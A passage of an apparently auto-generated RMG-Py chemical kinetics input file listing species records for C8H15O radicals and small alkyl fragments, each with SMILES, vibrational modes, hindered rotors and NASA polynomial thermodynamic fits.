energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C=C=CC([O])CC(24951)',
structure = SMILES('C=C=CC([O])CC'),
E0 = (157.831,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,355.088,355.097,355.133],'cm^-1')),
HinderedRotor(inertia=(0.159329,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.159216,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.159243,'amu*angstrom^2'), symmetry=1, barrier=(14.2541,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (97.1351,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.698001,0.0627288,-3.57609e-05,3.33546e-09,2.62597e-12,19109.9,28.114], Tmin=(100,'K'), Tmax=(1102.74,'K')), NASAPolynomial(coeffs=[14.6076,0.0286101,-1.15718e-05,2.14571e-09,-1.49866e-13,15048.9,-44.8557], Tmin=(1102.74,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(157.831,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(369.994,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(CC(C)OJ)"""),
)
species(
label = 'C=[C][CH]C(18176)',
structure = SMILES('[CH2][C]=CC'),
E0 = (361.056,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3010,987.5,1337.5,450,1655],'cm^-1')),
HinderedRotor(inertia=(0.352622,'amu*angstrom^2'), symmetry=1, barrier=(8.10748,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.828631,'amu*angstrom^2'), symmetry=1, barrier=(19.0519,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (54.0904,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.42015,0.030446,-1.69076e-05,4.64684e-09,-5.12013e-13,43485.7,14.8304], Tmin=(100,'K'), Tmax=(2065.83,'K')), NASAPolynomial(coeffs=[10.7464,0.014324,-5.20136e-06,8.69079e-10,-5.48385e-14,40045.6,-31.3799], Tmin=(2065.83,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(361.056,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(274.378,'J/(mol*K)'), comment="""Thermo library: DFT_QCI_thermo + radical(Cds_S) + radical(Allyl_P)"""),
)
species(
label = 'C2H5(29)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.6,1642.82,1642.96,3622.23,3622.39],'cm^-1')),
HinderedRotor(inertia=(0.866817,'amu*angstrom^2'), symmetry=1, barrier=(19.9298,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: Klippenstein_Glarborg2016"""),
)
species(
label = 'C=[C]C(C)C=O(24541)',
structure = SMILES('C=[C]C(C)C=O'),
E0 = (107.845,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2950,3100,1380,975,1025,1650,2782.5,750,1395,475,1775,1000,1685,370,1380,1390,370,380,2900,435,2750,2800,2850,1350,1500,750,1050,1375,1000,260.785],'cm^-1')),
HinderedRotor(inertia=(0.159261,'amu*angstrom^2'), symmetry=1, barrier=(7.89024,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.165465,'amu*angstrom^2'), symmetry=1, barrier=(7.90929,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.163225,'amu*angstrom^2'), symmetry=1, barrier=(7.89374,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (83.1085,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.92124,0.0495934,-4.34099e-05,2.53271e-08,-6.94482e-12,13042.2,21.4989], Tmin=(100,'K'), Tmax=(828.663,'K')), NASAPolynomial(coeffs=[5.09623,0.0342678,-1.56686e-05,3.00932e-09,-2.11821e-13,12516,6.77809], Tmin=(828.663,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.845,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)CsCsH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-OdCsH) + group(Cds-CdsHH) + radical(Cds_S)"""),
)
species(
label = 'C=C[C](C)C([O])CC(20837)',
structure = SMILES('[CH2]C=C(C)C([O])CC'),
E0 = (93.6706,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,1380,1390,370,380,2900,435,350,440,435,1725,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.230531,0.0810783,-5.01538e-05,1.00705e-08,1.1291e-12,11428.3,33.4333], Tmin=(100,'K'), Tmax=(1136.76,'K')), NASAPolynomial(coeffs=[17.1455,0.0371582,-1.49247e-05,2.73759e-09,-1.89289e-13,6365.1,-57.5174], Tmin=(1136.76,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(93.6706,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Allyl_P) + radical(CC(C)OJ)"""),
)
# --- Auto-generated RMG-Py pressure-dependent-network input: species records. ---
# Each species() call holds: structure (SMILES), ground-state energy E0, optional
# statistical-mechanics modes (harmonic oscillator + 1-D hindered rotors),
# collision/energy-transfer parameters, and a two-range NASA polynomial thermo fit.
# All numbers are machine-generated (group additivity / Joback estimates per the
# embedded comment strings) — do not hand-edit values.
# NOTE(review): the repeated HinderedRotor inertia/barrier (0.156089 amu*angstrom^2,
# 3.5888 kJ/mol) is RMG's generic placeholder for unfitted rotors — confirm upstream.

# C8H15O di-radical (vinylic + C2CsJOH sites per thermo comment); E0 = 146.165 kJ/mol; no modes listed.
species(
label = 'C=[C]C(C)[C](O)CC(24952)',
structure = SMILES('C=[C]C(C)[C](O)CC'),
E0 = (146.165,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0815184,0.0894041,-8.33846e-05,4.50035e-08,-1.03256e-11,17718,32.8981], Tmin=(100,'K'), Tmax=(1024.85,'K')), NASAPolynomial(coeffs=[11.1846,0.0460679,-1.99552e-05,3.7417e-09,-2.60052e-13,15442.2,-20.94], Tmin=(1024.85,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(146.165,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(C2CsJOH)"""),
)
# C8H15O di-radical (vinylic CH + alkoxy O); E0 = 209.152 kJ/mol; full mode listing with 5 hindered rotors.
species(
label = '[CH]=CC(C)C([O])CC(20846)',
structure = SMILES('[CH]=CC(C)C([O])CC'),
E0 = (209.152,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,3010,987.5,1337.5,450,1655,3120,650,792.5,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.420978,0.0846036,-6.28738e-05,2.40705e-08,-3.71766e-12,25324.9,35.0242], Tmin=(100,'K'), Tmax=(1529.81,'K')), NASAPolynomial(coeffs=[19.1374,0.0334648,-1.27319e-05,2.21965e-09,-1.46851e-13,19340.7,-67.6487], Tmin=(1529.81,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(209.152,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(Cds_P)"""),
)
# C8H15O di-radical (C2CsJOH + alkoxy sites); E0 = 138.684 kJ/mol; no modes listed.
species(
label = 'C=CC(C)[C]([O])CC(20839)',
structure = SMILES('C=CC(C)[C]([O])CC'),
E0 = (138.684,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.00496384,0.0841536,-6.48011e-05,2.66597e-08,-4.55702e-12,16826.4,32.4955], Tmin=(100,'K'), Tmax=(1356.71,'K')), NASAPolynomial(coeffs=[14.7361,0.0407219,-1.67827e-05,3.06443e-09,-2.09164e-13,12829.2,-43.0679], Tmin=(1356.71,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(138.684,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(C2CsJOH) + radical(CC(C)OJ)"""),
)
# C8H15O di-radical (isobutyl-type CH2 + alkoxy); E0 = 167.138 kJ/mol; includes Joback-estimated transport data.
species(
label = '[CH2]C(C=C)C([O])CC(20587)',
structure = SMILES('[CH2]C(C=C)C([O])CC'),
E0 = (167.138,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3010,987.5,1337.5,450,1655,2750,2800,2850,1350,1500,750,1050,1375,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3957.94,'J/mol'), sigma=(6.93706,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=618.22 K, Pc=26.9 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.138386,0.0807954,-5.31246e-05,1.37508e-08,1.52791e-13,20259.7,35.37], Tmin=(100,'K'), Tmax=(1086.5,'K')), NASAPolynomial(coeffs=[15.6233,0.0376896,-1.42142e-05,2.5161e-09,-1.70645e-13,15954,-46.0317], Tmin=(1086.5,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(167.138,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Isobutyl) + radical(CC(C)OJ)"""),
)
# C8H15O di-radical; note label and structure SMILES differ (resonance representation); E0 = 101.152 kJ/mol.
species(
label = 'C=[C][C](C)C(O)CC(24953)',
structure = SMILES('[CH2][C]=C(C)C(O)CC'),
E0 = (101.152,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.112481,0.0860735,-6.86715e-05,2.90429e-08,-5.05969e-12,12317.2,33.6679], Tmin=(100,'K'), Tmax=(1342.79,'K')), NASAPolynomial(coeffs=[15.68,0.0390294,-1.61191e-05,2.9516e-09,-2.01982e-13,8076.02,-47.1765], Tmin=(1342.79,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(101.152,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsH) + radical(Cds_S) + radical(Allyl_P)"""),
)
# --- Auto-generated RMG-Py species records (continued): C8H15O isomers with
# vinylic / alkyl radical site combinations. Numeric data is machine-generated;
# do not hand-edit. ---

# E0 = 169.439 kJ/mol; vinylic + CCJCO radical sites; 6 hindered rotors.
species(
label = 'C=[C]C(C)C(O)[CH]C(24954)',
structure = SMILES('C=[C]C(C)C(O)[CH]C'),
E0 = (169.439,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.171762,0.0825425,-6.22971e-05,2.46754e-08,-3.98364e-12,20536.5,36.8772], Tmin=(100,'K'), Tmax=(1456.04,'K')), NASAPolynomial(coeffs=[17.009,0.0353439,-1.36736e-05,2.41262e-09,-1.6116e-13,15533.3,-52.4654], Tmin=(1456.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(169.439,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_S) + radical(CCJCO)"""),
)
# E0 = 174.619 kJ/mol; isobutyl CH2 + vinylic radical sites; 6 hindered rotors.
species(
label = '[CH2]C([C]=C)C(O)CC(20843)',
structure = SMILES('[CH2]C([C]=C)C(O)CC'),
E0 = (174.619,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0759969,0.0863803,-7.34535e-05,3.48095e-08,-6.84212e-12,21151.3,35.8096], Tmin=(100,'K'), Tmax=(1202.96,'K')), NASAPolynomial(coeffs=[13.8574,0.0400497,-1.56827e-05,2.7936e-09,-1.88532e-13,17799,-33.9859], Tmin=(1202.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.619,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_S)"""),
)
# E0 = 161.958 kJ/mol; alkoxy + CCJCO radical sites; no modes listed.
species(
label = 'C=CC(C)C([O])[CH]C(20844)',
structure = SMILES('C=CC(C)C([O])[CH]C'),
E0 = (161.958,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0812271,0.0733942,-3.02894e-05,-1.03358e-08,8.43313e-12,19631.1,35.2966], Tmin=(100,'K'), Tmax=(1045.58,'K')), NASAPolynomial(coeffs=[16.1214,0.0372244,-1.45432e-05,2.66938e-09,-1.86484e-13,14899.7,-49.3886], Tmin=(1045.58,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(161.958,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(461.453,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(CC(C)OJ) + radical(CCJCO)"""),
)
# E0 = 174.783 kJ/mol; primary RCCJ + vinylic radical sites; 6 hindered rotors.
species(
label = '[CH2]CC(O)C(C)[C]=C(24955)',
structure = SMILES('[CH2]CC(O)C(C)[C]=C'),
E0 = (174.783,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1277.5,1000,2950,3100,1380,975,1025,1650,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,3000,3100,440,815,1455,1000,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0428563,0.0842572,-6.72652e-05,2.90455e-08,-5.22015e-12,21166.2,35.3871], Tmin=(100,'K'), Tmax=(1296.37,'K')), NASAPolynomial(coeffs=[14.1934,0.0405948,-1.6744e-05,3.06444e-09,-2.09755e-13,17497.3,-36.554], Tmin=(1296.37,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(174.783,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(RCCJ) + radical(Cds_S)"""),
)
# E0 = 216.633 kJ/mol; two vinylic radical sites (Cds_P + Cds_S); 6 hindered rotors.
species(
label = '[CH]=[C]C(C)C(O)CC(24956)',
structure = SMILES('[CH]=[C]C(C)C(O)CC'),
E0 = (216.633,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1277.5,1000,1685,370,1380,1383.33,1386.67,1390,370,373.333,376.667,380,2800,3000,430,440,2750,2850,1437.5,1250,1305,750,350,200,800],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (112.17,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
